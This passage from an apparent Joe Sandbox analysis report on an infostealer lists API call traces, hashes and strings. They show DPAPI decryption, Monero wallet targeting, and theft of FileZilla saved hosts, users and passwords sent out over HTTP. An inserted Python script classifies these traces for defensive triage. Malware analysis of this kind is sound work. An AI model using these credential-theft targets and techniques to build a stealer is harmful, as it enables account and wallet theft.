                  • Associated: 00000000.00000002.1714191818.0000000001061000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1714191818.000000000106D000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1714191818.0000000001092000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1714191818.00000000011FA000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1714337528.000000000120E000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1714337528.0000000001398000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1714337528.000000000146E000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1714337528.0000000001492000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1714337528.0000000001499000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1714337528.00000000014A8000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1714621077.00000000014A9000.00000080.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1714730643.0000000001643000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1714747116.0000000001644000.00000080.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_fb0000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: ByteCharCreateInstanceMultiWide
                  • String ID:
                  • API String ID: 123533781-0
                  • Opcode ID: 3fee4f85101735891f15b6fe2eb5a50996a08631f0d8e4736030fc5681a33f2a
                  • Instruction ID: 13c2001ec7d0fb49eb898b13b22927a8e553bc26dbcc49ec22175522bb666751
                  • Opcode Fuzzy Hash: 3fee4f85101735891f15b6fe2eb5a50996a08631f0d8e4736030fc5681a33f2a
                  • Instruction Fuzzy Hash: F2410771A00A289FDB24DB58CC85F9BB7B4BB48302F4081D8E608A72D0D771AEC5CF50
                  APIs
                  • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 00FB9B84
                  • LocalAlloc.KERNEL32(00000040,00000000), ref: 00FB9BA3
                  • LocalFree.KERNEL32(?), ref: 00FB9BD3
                  Memory Dump Source
                  • Source File: 00000000.00000002.1714191818.0000000000FB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                  • Associated: 00000000.00000002.1714174137.0000000000FB0000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1714191818.0000000001061000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1714191818.000000000106D000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1714191818.0000000001092000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1714191818.00000000011FA000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1714337528.000000000120E000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1714337528.0000000001398000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1714337528.000000000146E000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1714337528.0000000001492000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1714337528.0000000001499000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1714337528.00000000014A8000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1714621077.00000000014A9000.00000080.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1714730643.0000000001643000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1714747116.0000000001644000.00000080.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_fb0000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: Local$AllocCryptDataFreeUnprotect
                  • String ID:
                  • API String ID: 2068576380-0
                  • Opcode ID: f99715c0e73c13aef3cf5f2e05cfa9f9ae4eb78984eab3c0889b273e470db875
                  • Instruction ID: f6a4f64b5252130e78048f75e779d608205a3bd63c7abae99d6a5a4b73191168
                  • Opcode Fuzzy Hash: f99715c0e73c13aef3cf5f2e05cfa9f9ae4eb78984eab3c0889b273e470db875
                  • Instruction Fuzzy Hash: C111BAB8A00209DFDB04DFA4D985AAE77B5FF88300F108568E91597354D774AE50CF61
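                  The API listings in the entries above (CreateToolhelp32Snapshot/Process32First/Process32Next followed by StrCmpCA, the CryptBinaryToStringA and CryptStringToBinaryA calls with their raw dwFlags values, GetLocalTime and GetTimeZoneInformation feeding wsprintfA, CryptUnprotectData, and the \Monero\wallet.keys path reached through a subcall) are the call sequences an analyst turns into triage rules. The Python below is an added example, not part of the Joe Sandbox report and not Stealc's code: it parses API lines in the report's own format, labels each function with the capability its calls suggest, and decodes the CRYPT_STRING_* flags the report prints only as hex (0x40000001 is CRYPT_STRING_BASE64 | CRYPT_STRING_NOCRLF). The sample input is constructed from lines copied from the entries above; the rule table and the labels are this example's assumptions, not the sandbox's own signatures.

```python
"""Classify Joe Sandbox 'APIs' listings by the capability they suggest.
Added example, not part of the report or of Stealc: SAMPLE is copied from the
report's function entries; rules, labels and flag names are assumptions here."""
import re

# One call as the report prints it (bullet stripped), optionally prefixed by
# "Part of subcall function <addr>: " when it belongs to a callee.
API_RE = re.compile(
    r"^(?P<sub>Part of subcall function [0-9A-F]+:\s*)?"
    r"(?P<api>\w+)\.(?P<module>\w+)(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-F]+)$"
)
# dwFlags for CryptBinaryToString / CryptStringToBinary (wincrypt.h).
CRYPT_STRING_FORMATS = {0x1: "BASE64", 0x2: "BINARY", 0x4: "HEX", 0xC: "HEXRAW"}
CRYPT_STRING_MODIFIERS = {0x20000000: "STRICT", 0x40000000: "NOCRLF", 0x80000000: "NOCR"}

def decode_crypt_string_flags(value):
    """Name the format field (low byte) and any modifier bits of dwFlags."""
    names = [CRYPT_STRING_FORMATS.get(value & 0xFF, f"format_{value & 0xFF:#x}")]
    names += [n for bit, n in CRYPT_STRING_MODIFIERS.items() if value & bit]
    return "|".join("CRYPT_STRING_" + n for n in names)

def parse_functions(text):
    """Split the listing into functions; every 'APIs' header opens a new one."""
    functions, current = [], None
    for raw in text.splitlines():
        line = raw.strip().lstrip("•").strip()
        if line == "APIs":
            current = []
            functions.append(current)
        elif current is not None and (m := API_RE.match(line)):
            args = m.group("args")
            current.append({"api": m.group("api"), "ref": m.group("ref"),
                            "subcall": bool(m.group("sub")),
                            "args": [a.strip() for a in args.split(",")] if args else []})
    return functions

def classify(calls):
    """Map one function's calls to capability labels (this example's rules)."""
    names = [c["api"] for c in calls]
    apis, labels = set(names), set()
    if {"CreateToolhelp32Snapshot", "Process32First", "Process32Next"} <= apis:
        labels.add("process enumeration")
        if "StrCmpCA" in apis:
            labels.add("process name comparison")
    if "CryptUnprotectData" in apis:
        labels.add("DPAPI decryption")
    if {"GetLocalTime", "GetTimeZoneInformation"} & apis and "wsprintfA" in apis:
        labels.add("time/timezone fingerprint")
    if any("wallet.keys" in a for c in calls for a in c["args"]):
        labels.add("wallet file path")
    for c in calls:  # third argument of both Crypt*String* calls is dwFlags
        if c["api"] in ("CryptBinaryToStringA", "CryptStringToBinaryA") \
                and len(c["args"]) > 2 and re.fullmatch(r"[0-9A-F]+", c["args"][2]):
            verb = "encode" if c["api"] == "CryptBinaryToStringA" else "decode"
            labels.add(f"{verb} {decode_crypt_string_flags(int(c['args'][2], 16))}")
    # Size query, LocalAlloc, then the real decode: the classic two-call pattern.
    idx = [i for i, n in enumerate(names) if n == "CryptStringToBinaryA"]
    if len(idx) >= 2 and "LocalAlloc" in names[idx[0] + 1:idx[1]]:
        labels.add("two-pass decode")
    return sorted(labels)

def report(text):
    """Return {entry address: labels}, keyed by each function's first own call."""
    out = {}
    for calls in parse_functions(text):
        own = [c for c in calls if not c["subcall"]] or calls
        if own:
            out[own[0]["ref"]] = classify(calls)
    return out

# Constructed input: API lines copied verbatim from the report's function entries.
SAMPLE = r"""
APIs
• CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00FC961E
• Process32First.KERNEL32(00FD0ACA,00000128), ref: 00FC9632
• Process32Next.KERNEL32(00FD0ACA,00000128), ref: 00FC9647
• StrCmpCA.SHLWAPI(?,00000000), ref: 00FC965C
APIs
• CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,00FD05B7), ref: 00FC86CA
• Process32First.KERNEL32(?,00000128), ref: 00FC86DE
• Process32Next.KERNEL32(?,00000128), ref: 00FC86F3
  • Part of subcall function 00FCA9B0: lstrlen.KERNEL32(?,00C89158,?,\Monero\wallet.keys,00FD0E17), ref: 00FCA9C5
APIs
• CryptBinaryToStringA.CRYPT32(00000000,00FB5184,40000001,00000000,00000000,?,00FB5184), ref: 00FC8EC0
APIs
• CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00FB4EEE,00000000,00000000), ref: 00FB9AEF
• LocalAlloc.KERNEL32(00000040,?,?,?,00FB4EEE,00000000,?), ref: 00FB9B01
• CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00FB4EEE,00000000,00000000), ref: 00FB9B2A
APIs
• GetLocalTime.KERNEL32(?,?,?,?,?,00FD0E00,00000000,?), ref: 00FC79C4
• wsprintfA.USER32 ref: 00FC79F3
APIs
• CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 00FB9B84
"""

if __name__ == "__main__":
    for addr, labels in report(SAMPLE).items():
        print(addr, ", ".join(labels))
```

                  The labels are deliberately coarse: the report's "?" placeholders mean most argument values are unknown, so the rules key on which APIs appear together in one function and on the few concrete constants the sandbox did recover (the snapshot flag 2 for TH32CS_SNAPPROCESS, the dwFlags values, the wallet path). The two-pass rule matches the size-query, LocalAlloc, decode sequence visible at 00FB9AEF, 00FB9B01 and 00FB9B2A, which is how CryptStringToBinaryA is normally called and is a useful anchor when the flags themselves are not recovered.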
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1714337528.000000000120E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                  • Associated: 00000000.00000002.1714174137.0000000000FB0000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1714191818.0000000000FB1000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1714191818.0000000001061000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1714191818.000000000106D000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1714191818.0000000001092000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1714191818.00000000011FA000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1714337528.0000000001398000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1714337528.000000000146E000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1714337528.0000000001492000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1714337528.0000000001499000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1714337528.00000000014A8000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1714621077.00000000014A9000.00000080.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1714730643.0000000001643000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1714747116.0000000001644000.00000080.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_fb0000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID: 1 m^$c')7$z.^
                  • API String ID: 0-1602479497
                  • Opcode ID: b4cacb383ae1d7d3dff516089210d23c73bcfe1cfeb601a538baa1cadc059f08
                  • Instruction ID: 357e7598c79f0dd97543eec0cc182915dd698bb854ef879a1a55cc79453e681d
                  • Opcode Fuzzy Hash: b4cacb383ae1d7d3dff516089210d23c73bcfe1cfeb601a538baa1cadc059f08
                  • Instruction Fuzzy Hash: FC6159B3A186005BD308AE3DDD4563AFBE6EFD4720F16CA3DD5C8D7284EA3548058682
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1714337528.000000000120E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                  • Associated: 00000000.00000002.1714174137.0000000000FB0000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1714191818.0000000000FB1000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1714191818.0000000001061000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1714191818.000000000106D000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1714191818.0000000001092000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1714191818.00000000011FA000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1714337528.0000000001398000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1714337528.000000000146E000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1714337528.0000000001492000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1714337528.0000000001499000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1714337528.00000000014A8000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1714621077.00000000014A9000.00000080.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1714730643.0000000001643000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1714747116.0000000001644000.00000080.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_fb0000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID: #hs~$7h~u
                  • API String ID: 0-1014609230
                  • Opcode ID: c0cc3678ec4f260ae21259a12e80faeac45576cd15a71009cacb9b5c612ed601
                  • Instruction ID: a2460d006347208f0fa58e4fc4143c797e8b45c31ad74348ed8a6432c522f80c
                  • Opcode Fuzzy Hash: c0cc3678ec4f260ae21259a12e80faeac45576cd15a71009cacb9b5c612ed601
                  • Instruction Fuzzy Hash: 76422CF3A0C2049FE7146E2DEC4577ABBD9EBD4320F1A863DEAC4C7344E93558058696
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1714337528.0000000001398000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                  • Associated: 00000000.00000002.1714174137.0000000000FB0000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1714191818.0000000000FB1000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1714191818.0000000001061000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1714191818.000000000106D000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1714191818.0000000001092000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1714191818.00000000011FA000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1714337528.000000000120E000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1714337528.000000000146E000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1714337528.0000000001492000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1714337528.0000000001499000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1714337528.00000000014A8000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1714621077.00000000014A9000.00000080.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1714730643.0000000001643000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1714747116.0000000001644000.00000080.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_fb0000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID: r9;]$+t;
                  • API String ID: 0-1413941945
                  • Opcode ID: 248ecb4b789f373f473dfaac65d5a1acb0078f5139293e663cad913303a1b1da
                  • Instruction ID: 0360b9551e8469f17648ac44df9f90d45f385a35dda36387ddefd05c86772a93
                  • Opcode Fuzzy Hash: 248ecb4b789f373f473dfaac65d5a1acb0078f5139293e663cad913303a1b1da
                  • Instruction Fuzzy Hash: C04124B369C204DFF3086E299C8657AB7D9EBD4650F36462FE18347B60F97258438253
                  Memory Dump Source
                  • Source File: 00000000.00000002.1714337528.000000000120E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_fb0000_file.jbxd
                  Similarity
                  • String ID: Aw<
                  • API String ID: 0-1110198397
                  • Opcode ID: ab0373878c138e5ec49b5033320be86c116a6c9e51237ec090bd5fb870bfd39c
                  • Instruction ID: c779a035ff57eefa041b859b7f6ac3708fbbea52e1b7ba57f88acf8bbfe39bc5
                  • Opcode Fuzzy Hash: ab0373878c138e5ec49b5033320be86c116a6c9e51237ec090bd5fb870bfd39c
                  • Instruction Fuzzy Hash: AD5137F3B183185FE308692DEC55776B7CAD7D0720F2A813DEA4993780EC39AC0542A5
                  Memory Dump Source
                  • Source File: 00000000.00000002.1714337528.000000000120E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_fb0000_file.jbxd
                  Similarity
                  • String ID: $4w
                  • API String ID: 0-2789876972
                  • Opcode ID: 70d2b3f22be43aba7e2902c06b657c89de85537b2cabbff82496ef0f8abeb820
                  • Instruction ID: a16e70a57592923c78a3354aa1926d7aa56dcdda633780f1f1d0d0c102a661db
                  • Opcode Fuzzy Hash: 70d2b3f22be43aba7e2902c06b657c89de85537b2cabbff82496ef0f8abeb820
                  • Instruction Fuzzy Hash: B751F2B3E142204BE308993DDC89366B7999B58320F2B473DDAE9E77C4DC75580546C1
                  Memory Dump Source
                  • Source File: 00000000.00000002.1714337528.000000000120E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_fb0000_file.jbxd
                  Similarity
                  • String ID: @~}
                  • API String ID: 0-3301823823
                  • Opcode ID: 0dd63986985e70e2d2f5e2eb96084f1c6852965465e648d2333d08cfe755f6dd
                  • Instruction ID: 93c8e8e342174d88a42d4335e60623b3a092a25b9f4d5910cc7fb9ab635f0bcc
                  • Opcode Fuzzy Hash: 0dd63986985e70e2d2f5e2eb96084f1c6852965465e648d2333d08cfe755f6dd
                  • Instruction Fuzzy Hash: 6651E6F3A083049BE350AE69DC8476AB7E6EFD4310F1A853CDAC487384E6395C058787
                  Memory Dump Source
                  • Source File: 00000000.00000002.1714337528.000000000120E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_fb0000_file.jbxd
                  Similarity
                  • Opcode ID: bcd657e8244082c9079923be3e9c45395c37d52b04fc04bb26f9d8757637b2fc
                  • Instruction ID: f7ff986d6906fe6fa1f2662115ab9154ac4627e15fd434e46c4fcb4640773943
                  • Opcode Fuzzy Hash: bcd657e8244082c9079923be3e9c45395c37d52b04fc04bb26f9d8757637b2fc
                  • Instruction Fuzzy Hash: 595106B3A192105BF314996DEC84BBBB7DADBD4321F26863DEEC497784D9780C0186D2
                  Memory Dump Source
                  • Source File: 00000000.00000002.1714337528.000000000120E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_fb0000_file.jbxd
                  Similarity
                  • Opcode ID: b4e7d89e7fdf1013fafb097c739582b69cf214a8d8fdfe1bec1dd071000b969d
                  • Instruction ID: 488ee91f1ffa86a6db90521351a7283d1154de6222dcc15dc09bb08fc4292a60
                  • Opcode Fuzzy Hash: b4e7d89e7fdf1013fafb097c739582b69cf214a8d8fdfe1bec1dd071000b969d
                  • Instruction Fuzzy Hash: 1F516AB37087084FE304697EED8973ABBDADBD0320F27863ED68493794E97558058286
                  Memory Dump Source
                  • Source File: 00000000.00000002.1714337528.000000000120E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_fb0000_file.jbxd
                  Similarity
                  • Opcode ID: 4f44f479de9d1088eb814c4faa97b3c2ebcaafb90c5ee941652d38aaf28d2e1c
                  • Instruction ID: 249efd6b923b96dd074d53352da7c973cf3492db126d1bddb0617c058e55e653
                  • Opcode Fuzzy Hash: 4f44f479de9d1088eb814c4faa97b3c2ebcaafb90c5ee941652d38aaf28d2e1c
                  • Instruction Fuzzy Hash: 6A4129B3A041145BE3009A3EDC84727BAAAEFD4720F2AC13DDA9897348E93559064796
                  Memory Dump Source
                  • Source File: 00000000.00000002.1714337528.000000000120E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_fb0000_file.jbxd
                  Similarity
                  • Opcode ID: 287d6bc8398d43f98f96cbc0459faeefbb6ab4bc05403d898e3fe38b6ea16759
                  • Instruction ID: e76c467c11f30f410bd408785b5cec322c5d32475db3104f316acb918aa5188e
                  • Opcode Fuzzy Hash: 287d6bc8398d43f98f96cbc0459faeefbb6ab4bc05403d898e3fe38b6ea16759
                  • Instruction Fuzzy Hash: 8F41CFF39086008FF3546E29DC8577ABBE6EB94320F164A3CDFC5937C4DA3918468646
                  Memory Dump Source
                  • Source File: 00000000.00000002.1714191818.0000000000FB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_fb0000_file.jbxd
                  Similarity
                  • Opcode ID: eecc59efbe9cdf3acfc8abb57b86a9aab05cbe8bc62256deaf8fcc3308cb31aa
                  • Instruction ID: abbdd297b848902a35704da264ecc4a7d2e6ec457c67c65f9fa5c7ab4ebdfac4
                  • Opcode Fuzzy Hash: eecc59efbe9cdf3acfc8abb57b86a9aab05cbe8bc62256deaf8fcc3308cb31aa
                  • Instruction Fuzzy Hash: 1EE04878A56608EFC740CF88D584E49B7F8EB0D720F1181D5ED099B721D235EE00EA90
                  APIs
                    • Part of subcall function 00FCA740: lstrcpy.KERNEL32(00FD0E17,00000000), ref: 00FCA788
                    • Part of subcall function 00FC8DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00FC8E0B
                    • Part of subcall function 00FCA920: lstrcpy.KERNEL32(00000000,?), ref: 00FCA972
                    • Part of subcall function 00FCA920: lstrcat.KERNEL32(00000000), ref: 00FCA982
                    • Part of subcall function 00FCA8A0: lstrcpy.KERNEL32(?,00FD0E17), ref: 00FCA905
                    • Part of subcall function 00FCA9B0: lstrlen.KERNEL32(?,00C89158,?,\Monero\wallet.keys,00FD0E17), ref: 00FCA9C5
                    • Part of subcall function 00FCA9B0: lstrcpy.KERNEL32(00000000), ref: 00FCAA04
                    • Part of subcall function 00FCA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00FCAA12
                    • Part of subcall function 00FCA7A0: lstrcpy.KERNEL32(?,00000000), ref: 00FCA7E6
                    • Part of subcall function 00FB99C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00FB99EC
                    • Part of subcall function 00FB99C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00FB9A11
                    • Part of subcall function 00FB99C0: LocalAlloc.KERNEL32(00000040,?), ref: 00FB9A31
                    • Part of subcall function 00FB99C0: ReadFile.KERNEL32(000000FF,?,00000000,00FB148F,00000000), ref: 00FB9A5A
                    • Part of subcall function 00FB99C0: LocalFree.KERNEL32(00FB148F), ref: 00FB9A90
                    • Part of subcall function 00FB99C0: CloseHandle.KERNEL32(000000FF), ref: 00FB9A9A
                    • Part of subcall function 00FC8E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00FC8E52
                  • GetProcessHeap.KERNEL32(00000000,000F423F,00FD0DBA,00FD0DB7,00FD0DB6,00FD0DB3), ref: 00FC0362
                  • RtlAllocateHeap.NTDLL(00000000), ref: 00FC0369
                  • StrStrA.SHLWAPI(00000000,<Host>), ref: 00FC0385
                  • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00FD0DB2), ref: 00FC0393
                  • StrStrA.SHLWAPI(00000000,<Port>), ref: 00FC03CF
                  • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00FD0DB2), ref: 00FC03DD
                  • StrStrA.SHLWAPI(00000000,<User>), ref: 00FC0419
                  • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00FD0DB2), ref: 00FC0427
                  • StrStrA.SHLWAPI(00000000,<Pass encoding="base64">), ref: 00FC0463
                  • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00FD0DB2), ref: 00FC0475
                  • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00FD0DB2), ref: 00FC0502
                  • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00FD0DB2), ref: 00FC051A
                  • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00FD0DB2), ref: 00FC0532
                  • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00FD0DB2), ref: 00FC054A
                  • lstrcat.KERNEL32(?,browser: FileZilla), ref: 00FC0562
                  • lstrcat.KERNEL32(?,profile: null), ref: 00FC0571
                  • lstrcat.KERNEL32(?,url: ), ref: 00FC0580
                  • lstrcat.KERNEL32(?,00000000), ref: 00FC0593
                  • lstrcat.KERNEL32(?,00FD1678), ref: 00FC05A2
                  • lstrcat.KERNEL32(?,00000000), ref: 00FC05B5
                  • lstrcat.KERNEL32(?,00FD167C), ref: 00FC05C4
                  • lstrcat.KERNEL32(?,login: ), ref: 00FC05D3
                  • lstrcat.KERNEL32(?,00000000), ref: 00FC05E6
                  • lstrcat.KERNEL32(?,00FD1688), ref: 00FC05F5
                  • lstrcat.KERNEL32(?,password: ), ref: 00FC0604
                  • lstrcat.KERNEL32(?,00000000), ref: 00FC0617
                  • lstrcat.KERNEL32(?,00FD1698), ref: 00FC0626
                  • lstrcat.KERNEL32(?,00FD169C), ref: 00FC0635
                  • lstrlen.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00FD0DB2), ref: 00FC068E
                  Memory Dump Source
                  • Source File: 00000000.00000002.1714191818.0000000000FB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_fb0000_file.jbxd
                  Similarity
                  • API ID: lstrcat$lstrlen$lstrcpy$FileLocal$AllocHeap$AllocateCloseCreateFolderFreeHandlePathProcessReadSize
                  • String ID: <Host>$<Pass encoding="base64">$<Port>$<User>$\AppData\Roaming\FileZilla\recentservers.xml$browser: FileZilla$login: $password: $profile: null$url:
                  • API String ID: 1942843190-555421843
                  • Opcode ID: 52121a7dbcd430f6f27f89a30b2897f639e8971a99a3bd36e3bef2b0a1ccd494
                  • Instruction ID: fc20df5b47852734d2ee4a7f0845cab82e54fd7092368ee667e99027a09c1c79
                  • Opcode Fuzzy Hash: 52121a7dbcd430f6f27f89a30b2897f639e8971a99a3bd36e3bef2b0a1ccd494
                  • Instruction Fuzzy Hash: F6D15A71900109ABCB08EBE0DE96FEE7739BF14304F44452DF116A7185EE78BA46EB61
                  APIs
                    • Part of subcall function 00FCA7A0: lstrcpy.KERNEL32(?,00000000), ref: 00FCA7E6
                    • Part of subcall function 00FB47B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00FB4839
                    • Part of subcall function 00FB47B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00FB4849
                    • Part of subcall function 00FCA740: lstrcpy.KERNEL32(00FD0E17,00000000), ref: 00FCA788
                  • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00FB59F8
                  • StrCmpCA.SHLWAPI(?,00C8EAA8), ref: 00FB5A13
                  • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00FB5B93
                  • lstrlen.KERNEL32(00000000,00000000,?,00000000,00000000,?,",00000000,?,00C8EAE8,00000000,?,00C8A480,00000000,?,00FD1A1C), ref: 00FB5E71
                  • lstrlen.KERNEL32(00000000), ref: 00FB5E82
                  • GetProcessHeap.KERNEL32(00000000,?), ref: 00FB5E93
                  • RtlAllocateHeap.NTDLL(00000000), ref: 00FB5E9A
                  • lstrlen.KERNEL32(00000000), ref: 00FB5EAF
                  • lstrlen.KERNEL32(00000000), ref: 00FB5ED8
                  • lstrlen.KERNEL32(00000000,00000000,00000000), ref: 00FB5EF1
                  • lstrlen.KERNEL32(00000000,?,?), ref: 00FB5F1B
                  • HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 00FB5F2F
                  • InternetReadFile.WININET(00000000,?,000000C7,?), ref: 00FB5F4C
                  • InternetCloseHandle.WININET(00000000), ref: 00FB5FB0
